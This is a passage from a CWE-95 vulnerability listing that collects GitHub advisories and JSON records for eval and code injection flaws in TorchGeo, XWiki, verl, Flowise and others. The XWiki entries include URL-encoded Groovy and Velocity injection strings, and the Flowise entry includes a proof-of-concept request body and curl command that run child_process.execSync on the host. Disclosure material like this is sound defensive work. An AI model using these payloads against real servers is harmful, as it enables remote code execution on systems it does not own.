CWE-95
AllowedImproper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')
Abstraction: Variant · Status: Incomplete
The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes code syntax before using the input in a dynamic evaluation call (e.g. "eval").
262 vulnerabilities reference this CWE, most recent first.
GHSA-GHQ9-VC6F-8QJF
Vulnerability from github – Published: 2026-04-01 00:03 – Updated: 2026-04-01 00:03Impact
TorchGeo 0.4–0.6.0 used an eval statement in its model weight API that could allow an unauthenticated, remote attacker to execute arbitrary commands. All platforms that expose torchgeo.models.get_weight() or torchgeo.trainers as an external API could be affected.
Patches
The eval statement was replaced with a fixed enum lookup, preventing arbitrary code injection. All users are encouraged to upgrade to TorchGeo 0.6.1 or newer.
Workarounds
In unpatched versions, input validation and sanitization can be used to avoid this vulnerability.
References
Bug history
- Introduced: https://github.com/torchgeo/torchgeo/pull/917
- Patched: https://github.com/torchgeo/torchgeo/pull/2323
- Released: v0.6.1
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.6.0"
},
"package": {
"ecosystem": "PyPI",
"name": "torchgeo"
},
"ranges": [
{
"events": [
{
"introduced": "0.4"
},
{
"fixed": "0.6.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-49048"
],
"database_specific": {
"cwe_ids": [
"CWE-94",
"CWE-95"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-01T00:03:56Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Impact\n\nTorchGeo 0.4\u20130.6.0 used an [`eval`](https://docs.python.org/3/library/functions.html#eval) statement in its model weight API that could allow an unauthenticated, remote attacker to execute arbitrary commands. All platforms that expose [`torchgeo.models.get_weight()`](https://torchgeo.readthedocs.io/en/v0.6.0/api/models.html#torchgeo.models.get_weight) or [`torchgeo.trainers`](https://torchgeo.readthedocs.io/en/v0.6.0/api/trainers.html) as an external API could be affected.\n\n### Patches\n\nThe `eval` statement was replaced with a fixed enum lookup, preventing arbitrary code injection. All users are encouraged to upgrade to TorchGeo 0.6.1 or newer.\n\n### Workarounds\n\nIn unpatched versions, input validation and sanitization can be used to avoid this vulnerability.\n\n### References\n\n#### Bug history\n\n* Introduced: https://github.com/torchgeo/torchgeo/pull/917\n* Patched: https://github.com/torchgeo/torchgeo/pull/2323\n* Released: [v0.6.1](https://github.com/microsoft/torchgeo/releases/tag/v0.6.1)",
"id": "GHSA-ghq9-vc6f-8qjf",
"modified": "2026-04-01T00:03:56Z",
"published": "2026-04-01T00:03:56Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/torchgeo/torchgeo/security/advisories/GHSA-ghq9-vc6f-8qjf"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-49048"
},
{
"type": "WEB",
"url": "https://github.com/torchgeo/torchgeo/pull/2323"
},
{
"type": "WEB",
"url": "https://github.com/torchgeo/torchgeo/pull/917"
},
{
"type": "WEB",
"url": "https://github.com/torchgeo/torchgeo/commit/1a980788cb7089a1115f3b786c7daa9dd47d7d7a"
},
{
"type": "WEB",
"url": "https://github.com/microsoft/torchgeo/releases/tag/v0.6.1"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/torchgeo/PYSEC-2024-204.yaml"
},
{
"type": "PACKAGE",
"url": "https://github.com/torchgeo/torchgeo"
},
{
"type": "WEB",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49048"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "TorchGeo Remote Code Execution Vulnerability"
}
GHSA-GWJ6-XPFG-PXWR
Vulnerability from github – Published: 2025-09-08 20:59 – Updated: 2025-09-10 21:05Impact
The blog application in XWiki allowed remote code execution for any user who has edit right on any page. Normally, these are all logged-in users as they can edit their own user profile. To exploit, it is sufficient to add an object of type Blog.BlogPostClass to any page and to add some script macro with the exploit code to the "Content" field of that object.
Patches
The vulnerability has been patched in the blog application version 9.14 by executing the content of blog posts with the rights of the appropriate author.
Workarounds
We're not aware of any workarounds.
Resources
- https://jira.xwiki.org/browse/BLOG-191
- https://github.com/xwiki-contrib/application-blog/commit/b98ab6f17da3029576f42d12b4442cd555c7e0b4
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.xwiki.contrib.blog:application-blog-ui"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "9.14"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-58365"
],
"database_specific": {
"cwe_ids": [
"CWE-250",
"CWE-94",
"CWE-95"
],
"github_reviewed": true,
"github_reviewed_at": "2025-09-08T20:59:47Z",
"nvd_published_at": "2025-09-08T22:15:34Z",
"severity": "HIGH"
},
"details": "### Impact\nThe blog application in XWiki allowed remote code execution for any user who has edit right on any page. Normally, these are all logged-in users as they can edit their own user profile. To exploit, it is sufficient to add an object of type `Blog.BlogPostClass` to any page and to add some script macro with the exploit code to the \"Content\" field of that object.\n\n### Patches\nThe vulnerability has been patched in the blog application version 9.14 by executing the content of blog posts with the rights of the appropriate author.\n\n### Workarounds\nWe\u0027re not aware of any workarounds.\n\n### Resources\n* https://jira.xwiki.org/browse/BLOG-191\n* https://github.com/xwiki-contrib/application-blog/commit/b98ab6f17da3029576f42d12b4442cd555c7e0b4",
"id": "GHSA-gwj6-xpfg-pxwr",
"modified": "2025-09-10T21:05:21Z",
"published": "2025-09-08T20:59:47Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/xwiki-contrib/application-blog/security/advisories/GHSA-gwj6-xpfg-pxwr"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58365"
},
{
"type": "WEB",
"url": "https://github.com/xwiki-contrib/application-blog/commit/b98ab6f17da3029576f42d12b4442cd555c7e0b4"
},
{
"type": "PACKAGE",
"url": "https://github.com/xwiki-contrib/application-blog"
},
{
"type": "WEB",
"url": "https://jira.xwiki.org/browse/BLOG-191"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "XWiki Blog Application: Privilege Escalation (PR) from account through blog content"
}
GHSA-H25W-QH4W-J2HF
Vulnerability from github – Published: 2024-01-08 15:30 – Updated: 2024-09-04 21:30OpenVPN Connect version 3.0 through 3.4.6 on macOS allows local users to execute code in external third party libraries using the DYLD_INSERT_LIBRARIES environment variable
{
"affected": [],
"aliases": [
"CVE-2023-7224"
],
"database_specific": {
"cwe_ids": [
"CWE-94",
"CWE-95"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-01-08T14:15:47Z",
"severity": "HIGH"
},
"details": "OpenVPN Connect version 3.0 through 3.4.6 on macOS allows local users to execute code in external third party libraries using the DYLD_INSERT_LIBRARIES environment variable",
"id": "GHSA-h25w-qh4w-j2hf",
"modified": "2024-09-04T21:30:30Z",
"published": "2024-01-08T15:30:27Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-7224"
},
{
"type": "WEB",
"url": "https://openvpn.net/vpn-server-resources/openvpn-connect-for-macos-change-log"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-H4VP-69R8-GVJG
Vulnerability from github – Published: 2023-07-14 21:53 – Updated: 2023-07-14 21:53Impact
Improper escaping in the document SkinsCode.XWikiSkinsSheet leads to a possible privilege escalation from view right on that document to programming rights, or in other words, it is possible to execute arbitrary script macros including Groovy and Python macros that allow remote code execution including unrestricted read and write access to all wiki contents.
The attack works by opening a non-existing page with a name crafted to contain a dangerous payload.
It is possible to check if an existing installation is vulnerable by opening <xwiki-host>/xwiki/bin/view/%22%5D%5D%20%7B%7Basync%20async%3D%22true%22%20cached%3D%22false%22%20context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22Hello%20%22%20%2B%20%22from%20groovy!%22)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D?sheet=SkinsCode.XWikiSkinsSheet&xpage=view where <xwiki-host is the URL of the XWiki installation. The expected result are two list items with "Edit this skin" and "Test this skin" without any further text. If the installation is vulnerable, the second list item is "Test this skin Hello from groovy!.WebHome"]]". This shows that the Groovy macro has been executed.
Patches
This has been patched in XWiki 14.4.8, 14.10.4 and 15.0-rc-1.
Workarounds
The fix can also be applied manually to the impacted document SkinsCode.XWikiSkinsSheet.
References
- https://jira.xwiki.org/browse/XWIKI-20457
- https://github.com/xwiki/xwiki-platform/commit/d9c88ddc4c0c78fa534bd33237e95dea66003d29
For more information
If you have any questions or comments about this advisory: * Open an issue in Jira XWiki.org * Email us at Security Mailing List
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.xwiki.platform:xwiki-platform-skin-ui"
},
"ranges": [
{
"events": [
{
"introduced": "7.0-rc-1"
},
{
"fixed": "14.4.8"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.xwiki.platform:xwiki-platform-skin-ui"
},
"ranges": [
{
"events": [
{
"introduced": "14.5"
},
{
"fixed": "14.10.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-37462"
],
"database_specific": {
"cwe_ids": [
"CWE-74",
"CWE-95"
],
"github_reviewed": true,
"github_reviewed_at": "2023-07-14T21:53:52Z",
"nvd_published_at": "2023-07-14T21:15:08Z",
"severity": "CRITICAL"
},
"details": "### Impact\n\nImproper escaping in the document `SkinsCode.XWikiSkinsSheet` leads to a possible privilege escalation from view right on that document to programming rights, or in other words, it is possible to execute arbitrary script macros including Groovy and Python macros that allow remote code execution including unrestricted read and write access to all wiki contents.\n\nThe attack works by opening a non-existing page with a name crafted to contain a dangerous payload.\n\nIt is possible to check if an existing installation is vulnerable by opening `\u003cxwiki-host\u003e/xwiki/bin/view/%22%5D%5D%20%7B%7Basync%20async%3D%22true%22%20cached%3D%22false%22%20context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22Hello%20%22%20%2B%20%22from%20groovy!%22)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D?sheet=SkinsCode.XWikiSkinsSheet\u0026xpage=view` where \u003cxwiki-host is the URL of the XWiki installation. The expected result are two list items with \"Edit this skin\" and \"Test this skin\" without any further text. If the installation is vulnerable, the second list item is \"Test this skin Hello from groovy!.WebHome\"]]\". This shows that the Groovy macro has been executed.\n\n### Patches\n\nThis has been patched in XWiki 14.4.8, 14.10.4 and 15.0-rc-1.\n\n### Workarounds\n\nThe [fix](https://github.com/xwiki/xwiki-platform/commit/d9c88ddc4c0c78fa534bd33237e95dea66003d29) can also be applied manually to the impacted document `SkinsCode.XWikiSkinsSheet`.\n\n### References\n\n* https://jira.xwiki.org/browse/XWIKI-20457\n* https://github.com/xwiki/xwiki-platform/commit/d9c88ddc4c0c78fa534bd33237e95dea66003d29\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)\n* Email us at [Security Mailing List](mailto:security@xwiki.org)\n",
"id": "GHSA-h4vp-69r8-gvjg",
"modified": "2023-07-14T21:53:52Z",
"published": "2023-07-14T21:53:52Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-h4vp-69r8-gvjg"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37462"
},
{
"type": "WEB",
"url": "https://github.com/xwiki/xwiki-platform/commit/d9c88ddc4c0c78fa534bd33237e95dea66003d29"
},
{
"type": "PACKAGE",
"url": "https://github.com/xwiki/xwiki-platform"
},
{
"type": "WEB",
"url": "https://jira.xwiki.org/browse/XWIKI-20457"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "org.xwiki.platform:xwiki-platform-skin-ui Eval Injection vulnerability"
}
GHSA-H57C-V2V3-5V3V
Vulnerability from github – Published: 2026-04-23 00:31 – Updated: 2026-04-30 20:52A vulnerability was identified in ByteDance verl up to 0.7.1. Affected is the function math_equal of the file prime_math/grader.py. The manipulation leads to a sandbox issue. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit is publicly available and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "verl"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "0.7.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-6878"
],
"database_specific": {
"cwe_ids": [
"CWE-95"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-30T20:52:35Z",
"nvd_published_at": "2026-04-23T00:16:47Z",
"severity": "LOW"
},
"details": "A vulnerability was identified in ByteDance verl up to 0.7.1. Affected is the function math_equal of the file prime_math/grader.py. The manipulation leads to a sandbox issue. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit is publicly available and may be used. The vendor was contacted early about this disclosure but did not respond in any way.",
"id": "GHSA-h57c-v2v3-5v3v",
"modified": "2026-04-30T20:52:35Z",
"published": "2026-04-23T00:31:20Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6878"
},
{
"type": "PACKAGE",
"url": "https://github.com/verl-project/verl"
},
{
"type": "WEB",
"url": "https://github.com/verl-project/verl/blob/v0.7.1/verl/utils/reward_score/prime_math/grader.py"
},
{
"type": "WEB",
"url": "https://github.com/zast-ai/vulnerability-reports/blob/main/bytedance/verl_rce.md"
},
{
"type": "WEB",
"url": "https://vuldb.com/submit/795257"
},
{
"type": "WEB",
"url": "https://vuldb.com/vuln/359040"
},
{
"type": "WEB",
"url": "https://vuldb.com/vuln/359040/cti"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "verl\u0027s math_equal() Vulnerable to Arbitrary Code Execution via Unsafe eval()"
}
GHSA-H63H-5C77-77P5
Vulnerability from github – Published: 2024-07-31 15:24 – Updated: 2024-09-06 21:41Impact
Any user with edit right on any page can perform arbitrary remote code execution by adding instances of XWiki.SearchSuggestConfig and XWiki.SearchSuggestSourceClass to their user profile or any other page. This compromises the confidentiality, integrity and availability of the whole XWiki installation.
To reproduce on an instance, as a user without script nor programming rights, add an object of type XWiki.SearchSuggestConfig to your profile page, and an object of type XWiki.SearchSuggestSourceClass as well. On this last object, set both name and icon properties to $services.logging.getLogger("attacker").error("I got programming: $services.security.authorization.hasAccess('programming')") and limit and engine to {{/html}}{{async}}{{velocity}}$services.logging.getLogger("attacker").error("I got programming: $services.security.authorization.hasAccess('programming')"){{/velocity}}{{/async}}. Save and display the page. If the logs contain any message ERROR attacker - I got programming: true then the instance is vulnerable.
Patches
This vulnerability has been patched in XWiki 14.10.21, 15.5.5 and 15.10.2.
Workarounds
We're not aware of any workaround except upgrading.
References
- https://jira.xwiki.org/browse/XWIKI-21473
- https://github.com/xwiki/xwiki-platform/commit/742cd4591642be4cdcaf68325f17540e0934e64e
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.xwiki.platform:xwiki-platform-search-ui"
},
"ranges": [
{
"events": [
{
"introduced": "9.2-rc-1"
},
{
"fixed": "14.10.21"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.xwiki.platform:xwiki-platform-search-ui"
},
"ranges": [
{
"events": [
{
"introduced": "15.0-rc-1"
},
{
"fixed": "15.5.5"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.xwiki.platform:xwiki-platform-search-ui"
},
"ranges": [
{
"events": [
{
"introduced": "15.6-rc-1"
},
{
"fixed": "15.10.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-37901"
],
"database_specific": {
"cwe_ids": [
"CWE-862",
"CWE-94",
"CWE-95"
],
"github_reviewed": true,
"github_reviewed_at": "2024-07-31T15:24:37Z",
"nvd_published_at": "2024-07-31T16:15:03Z",
"severity": "CRITICAL"
},
"details": "### Impact\nAny user with edit right on any page can perform arbitrary remote code execution by adding instances of `XWiki.SearchSuggestConfig` and `XWiki.SearchSuggestSourceClass` to their user profile or any other page. This compromises the confidentiality, integrity and availability of the whole XWiki installation.\n\nTo reproduce on an instance, as a user without script nor programming rights, add an object of type `XWiki.SearchSuggestConfig` to your profile page, and an object of type `XWiki.SearchSuggestSourceClass` as well. On this last object, set both `name` and `icon` properties to `$services.logging.getLogger(\"attacker\").error(\"I got programming: $services.security.authorization.hasAccess(\u0027programming\u0027)\")` and `limit` and `engine` to `{{/html}}{{async}}{{velocity}}$services.logging.getLogger(\"attacker\").error(\"I got programming: $services.security.authorization.hasAccess(\u0027programming\u0027)\"){{/velocity}}{{/async}}`. Save and display the page. If the logs contain any message `ERROR attacker - I got programming: true` then the instance is vulnerable.\n\n### Patches\nThis vulnerability has been patched in XWiki 14.10.21, 15.5.5 and 15.10.2.\n\n### Workarounds\nWe\u0027re not aware of any workaround except upgrading.\n\n### References\n- https://jira.xwiki.org/browse/XWIKI-21473\n- https://github.com/xwiki/xwiki-platform/commit/742cd4591642be4cdcaf68325f17540e0934e64e",
"id": "GHSA-h63h-5c77-77p5",
"modified": "2024-09-06T21:41:22Z",
"published": "2024-07-31T15:24:37Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-h63h-5c77-77p5"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-37901"
},
{
"type": "WEB",
"url": "https://github.com/xwiki/xwiki-platform/commit/0b135760514fef73db748986a3311f3edd4a553b"
},
{
"type": "WEB",
"url": "https://github.com/xwiki/xwiki-platform/commit/742cd4591642be4cdcaf68325f17540e0934e64e"
},
{
"type": "WEB",
"url": "https://github.com/xwiki/xwiki-platform/commit/9ce3e0319869b6d8131fc4e0909736f7041566a4"
},
{
"type": "WEB",
"url": "https://github.com/xwiki/xwiki-platform/commit/bbde8a4f564e3c28839440076334a9093e2b4834"
},
{
"type": "PACKAGE",
"url": "https://github.com/xwiki/xwiki-platform"
},
{
"type": "WEB",
"url": "https://jira.xwiki.org/browse/XWIKI-21473"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
"type": "CVSS_V4"
}
],
"summary": "XWiki Platform vulnerable to remote code execution from account via SearchSuggestConfigSheet"
}
GHSA-HF43-47Q4-FHQ5
Vulnerability from github – Published: 2024-04-10 17:16 – Updated: 2024-04-10 22:01Impact
The HTML escaping of escaping tool that is used in XWiki doesn't escape {, which, when used in certain places, allows XWiki syntax injection and thereby remote code execution.
To reproduce in an XWiki installation, open <xwiki-host>/xwiki/bin/view/Panels/PanelLayoutUpdate?place=%7B%7B%2Fhtml%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bvelocity%7D%7D%23evaluate(%24request.eval)%7B%7B%2Fvelocity%7D%7D%7B%7B%2Fasync%7D%7D&eval=Hello%20from%20URL%20Parameter!%20I%20got%20programming%3A%20%24services.security.authorization.hasAccess(%27programming%27) where <xwiki-host> is the URL of your XWiki installation. If this displays You are not admin on this place Hello from URL Parameter! I got programming: true, the installation is vulnerable.
Patches
The vulnerability has been fixed on XWiki 14.10.19, 15.5.5, and 15.9 RC1.
Workarounds
Apart from upgrading, there is no generic workaround. However, replacing $escapetool.html by $escapetool.xml in XWiki documents fixes the vulnerability. In a standard XWiki installation, we're only aware of the document Panels.PanelLayoutUpdate that exposes this vulnerability, patching this document is thus a workaround. Any extension could expose this vulnerability and might thus require patching, too.
References
- https://github.com/xwiki/xwiki-commons/commit/b94142e2a66ec32e89eacab67c3da8d91f5ef93a
- https://jira.xwiki.org/browse/XCOMMONS-2828
- https://jira.xwiki.org/browse/XWIKI-21438
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.xwiki.commons:xwiki-commons-velocity"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.1"
},
{
"fixed": "14.10.19"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.xwiki.commons:xwiki-commons-velocity"
},
"ranges": [
{
"events": [
{
"introduced": "15.0-rc-1"
},
{
"fixed": "15.5.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.xwiki.commons:xwiki-commons-velocity"
},
"ranges": [
{
"events": [
{
"introduced": "15.6-rc-1"
},
{
"fixed": "15.9-rc-1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-31996"
],
"database_specific": {
"cwe_ids": [
"CWE-94",
"CWE-95"
],
"github_reviewed": true,
"github_reviewed_at": "2024-04-10T17:16:37Z",
"nvd_published_at": "2024-04-10T21:15:07Z",
"severity": "CRITICAL"
},
"details": "### Impact\nThe HTML escaping of escaping tool that is used in XWiki doesn\u0027t escape `{`, which, when used in certain places, allows XWiki syntax injection and thereby remote code execution.\n\nTo reproduce in an XWiki installation, open `\u003cxwiki-host\u003e/xwiki/bin/view/Panels/PanelLayoutUpdate?place=%7B%7B%2Fhtml%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bvelocity%7D%7D%23evaluate(%24request.eval)%7B%7B%2Fvelocity%7D%7D%7B%7B%2Fasync%7D%7D\u0026eval=Hello%20from%20URL%20Parameter!%20I%20got%20programming%3A%20%24services.security.authorization.hasAccess(%27programming%27)` where `\u003cxwiki-host\u003e` is the URL of your XWiki installation. If this displays `You are not admin on this place Hello from URL Parameter! I got programming: true`, the installation is vulnerable.\n\n### Patches\nThe vulnerability has been fixed on XWiki 14.10.19, 15.5.5, and 15.9 RC1.\n\n### Workarounds\nApart from upgrading, there is no generic workaround. However, replacing `$escapetool.html` by `$escapetool.xml` in XWiki documents fixes the vulnerability. In a standard XWiki installation, we\u0027re only aware of the document `Panels.PanelLayoutUpdate` that exposes this vulnerability, patching this document is thus a workaround. Any extension could expose this vulnerability and might thus require patching, too.\n\n### References\n- https://github.com/xwiki/xwiki-commons/commit/b94142e2a66ec32e89eacab67c3da8d91f5ef93a\n- https://jira.xwiki.org/browse/XCOMMONS-2828\n- https://jira.xwiki.org/browse/XWIKI-21438",
"id": "GHSA-hf43-47q4-fhq5",
"modified": "2024-04-10T22:01:56Z",
"published": "2024-04-10T17:16:37Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/xwiki/xwiki-commons/security/advisories/GHSA-hf43-47q4-fhq5"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31996"
},
{
"type": "WEB",
"url": "https://github.com/xwiki/xwiki-commons/commit/b0805160ec7b01ee12417e79cb384e60ae4817aa"
},
{
"type": "WEB",
"url": "https://github.com/xwiki/xwiki-commons/commit/b94142e2a66ec32e89eacab67c3da8d91f5ef93a"
},
{
"type": "WEB",
"url": "https://github.com/xwiki/xwiki-commons/commit/ed7ff515a2436a1c6dcbd0c6ca0c41e434d58915"
},
{
"type": "PACKAGE",
"url": "https://github.com/xwiki/xwiki-commons"
},
{
"type": "WEB",
"url": "https://jira.xwiki.org/browse/XCOMMONS-2828"
},
{
"type": "WEB",
"url": "https://jira.xwiki.org/browse/XWIKI-21438"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "XWiki Commons missing escaping of `{` in Velocity escapetool allows remote code execution"
}
GHSA-HGR6-FXR2-JX3F
Vulnerability from github – Published: 2024-01-12 09:30 – Updated: 2024-01-12 09:30Privilege escalation in mk_tsm agent plugin in Checkmk before 2.2.0p17, 2.1.0p37 and 2.0.0p39 allows local user to escalate privileges
{
"affected": [],
"aliases": [
"CVE-2023-6735"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-269",
"CWE-95"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-01-12T08:15:43Z",
"severity": "HIGH"
},
"details": "Privilege escalation in mk_tsm agent plugin in Checkmk before 2.2.0p17, 2.1.0p37 and 2.0.0p39 allows local user to escalate privileges",
"id": "GHSA-hgr6-fxr2-jx3f",
"modified": "2024-01-12T09:30:29Z",
"published": "2024-01-12T09:30:29Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6735"
},
{
"type": "WEB",
"url": "https://checkmk.com/werk/16273"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-HMGH-466J-FX4C
Vulnerability from github – Published: 2025-10-06 14:08 – Updated: 2025-10-06 14:08Summary
User-controlled input flows to an unsafe implementaion of a dynamic Function constructor , allowing a malicious actor to run JS code in the context of the host (not sandboxed) leading to RCE.
Details
When creating a new Custom MCP Chatflow in the platform, the MCP Server Config displays a placeholder hinting at an example of the expected input structure:
{
"command": "npx",
"args": ["-y", "@modelcontextprotocol/server-filesystem", "/path/to/allowed/files"]
}
Behind the scene, a POST request to /api/v1/node-load-method/customMCP is sent with the provided MCP Server Config, with additional parameters (excluded for brevity):
{
...SNIP...
"inputs":{
"mcpServerConfig":{
"command":"npx",
"args":[
"-y",
"@modelcontextprotocol/server-filesystem",
"/path/to/allowed/files"
]
}
},
"loadMethod":"listActions"
...SNIP...
}
Sending the same request with the parameter mcpServerConfig equals to a plain value and not an object, for example:
{
"inputs":{
"mcpServerConfig":"test"
},
"loadMethod":"listActions"
}
We enter an interesting code flow that leads to a function named convertValidJSONString (Line 103):
https://github.com/FlowiseAI/Flowise/blob/416e57380ea7ce2e66f89aded61b249ff3eef3b2/packages/components/nodes/tools/MCP/CustomMCP/CustomMCP.ts#L103
async getTools(nodeData: INodeData): Promise<Tool[]> {
const mcpServerConfig = nodeData.inputs?.mcpServerConfig as string
if (!mcpServerConfig) {
throw new Error('MCP Server Config is required')
}
try {
let serverParams
if (typeof mcpServerConfig === 'object') {
serverParams = mcpServerConfig
} else if (typeof mcpServerConfig === 'string') {
const serverParamsString = convertToValidJSONString(mcpServerConfig) <--
serverParams = JSON.parse(serverParamsString)
}
const toolkit = new MCPToolkit(serverParams, 'stdio')
await toolkit.initialize()
const tools = toolkit.tools ?? []
return tools as Tool[]
} catch (error) {
throw new Error(`Invalid MCP Server Config: ${error}`)
}
}
}
Here, the value of inputString originating from mcpServerConfig is being concatenated to a dynamic Function constructor that evaluates the provided value similar to using eval:
function convertToValidJSONString(inputString: string) {
try {
const jsObject = Function('return ' + inputString)()
return JSON.stringify(jsObject, null, 2)
} catch (error) {
console.error('Error converting to JSON:', error)
return ''
}
}
This JS code runs in the context of the host, not sandboxed using @flowiseai/nodevm like other code execution functionalities within the platform.
This enables access to the global process object and as a result access to all the native NodeJS modules available such as child_process, leading to Remote Code Execution.
{
"inputs":{
"mcpServerConfig":"(global.process.mainModule.require('child_process').execSync('touch /tmp/yofitofi'))"
},
"loadMethod":"listActions"
}
PoC
-
Follow the provided instructions for running the app using Docker Compose (or other methods of your choosing such as
npx,pnpm, etc): https://github.com/FlowiseAI/Flowise?tab=readme-ov-file#-docker -
Create a new file named
payload.jsonsomewhere in your machine, with the following data:
{"inputs":{"mcpServerConfig":"(global.process.mainModule.require('child_process').execSync('touch /tmp/yofitofi'))"},
"loadMethod":"listActions"}
- Send the following
curlrequest using thepayload.jsonfile created above with the following command:
curl -XPOST -H "x-request-from: internal" -H "Content-Type: application/json" --data @payload.json "http://localhost:3000/api/v1/node-load-method/customMCP"
- Observe that a new file named
yofitofiis created under/tmpfolder.
Impact
Remote code execution
Credit
The vulnerability was discovered by Assaf Levkovich of the JFrog Security Research team.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "flowise"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "2.2.7-patch.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-55346"
],
"database_specific": {
"cwe_ids": [
"CWE-627",
"CWE-95"
],
"github_reviewed": true,
"github_reviewed_at": "2025-10-06T14:08:45Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
